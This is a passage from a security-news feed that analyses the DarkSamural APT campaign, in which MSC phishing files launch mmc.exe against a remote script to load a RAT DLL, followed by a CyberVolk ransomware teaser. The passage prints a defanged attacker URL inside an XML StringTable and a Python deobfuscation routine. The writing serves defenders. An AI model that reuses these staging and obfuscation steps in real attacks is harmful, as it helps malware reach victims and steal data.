    The combination of open-source and proprietary RATs—including Mythic, QuasarRat, and BADNEWS—grants the attackers versatile control over compromised machines.

    Unit 942 Drone Info MAK3 (Source – Ctfiot)

    Files harvested range from administrative documents to proprietary research, underscoring the campaign’s strategic focus on exfiltrating high-value targets.

    Further analysis reveals that the malicious DLL embeds an export function, DIIRegisterServer, which dynamically resolves critical Windows APIs.

    Upon execution, the sample gathers host details such as machine name, user account, and process ID, packaging them into a JSON check-in packet.

    This packet is encrypted with AES-128-GCM and transmitted to the C2 endpoint over WinHTTP. The resulting network artifacts mimic legitimate update traffic, complicating anomaly detection.

    Infection Mechanism and Obfuscation

    A closer examination of the MSC file’s internal structure uncovers a multi-layered obfuscation scheme designed to thwart reverse engineering.

    The initial JavaScript code, embedded in an XML StringTable, triggers an XSL transformation that launches mmc[.]exe with a remote script reference.

    Phishing file (Source – Ctfiot)
    <StringTable>
      <GUID> {71E5B33E-1064-11D2-808F-0000F875A9CE} </GUID>
      <Strings>
        <String ID="14"> https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html </String>
      </Strings>
    </StringTable>

    After fetching the second layer, the script reverses character sequences, substitutes tokens, converts to hexadecimal, and performs Base64 decoding to produce the final DLL.

    The decoding routine exemplifies this transformation in Python:-

    def decode (str):
        b = list (str)
        c = ''[.]join (b[::-1]) [.]replace("$", "4") [.]replace ("!", "1")
        d = ''[.]join ([chr (int (c [i:i+2], 16)) for i in range (0, len (c), 2)])
        return base64[.]b64decode (d)

    Subsequently, the decoded bytes are written to disk and registered as a COM server, ensuring execution on system startup.

    This layered obfuscation, combined with scheduled task creation, illustrates DarkSamural’s meticulous approach to infection and evasion.

    Cybersecurity teams should inspect MSC file behavior, monitor anomalous mmc[.]exe invocations, and validate script-based downloads against known artifact hashes to detect and disrupt this campaign.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post DarkSamural APT Group Malicious LNK and PDF Files to Steal Critical Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CyberVolk ransomware, which first emerged in May 2024, has escalated its operations against government agencies, critical infrastructure, and scientific institutions across Japan, France, and the United Kingdom. Operating with pro-Russian leanings, CyberVolk specifically targets states perceived as hostile to Russian interests, leveraging sophisticated encryption techniques that render decryption impossible. This article delivers a technical analysis […]

    The post CyberVolk Ransomware Targets Windows Systems in Critical Infrastructure and Research Institutions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶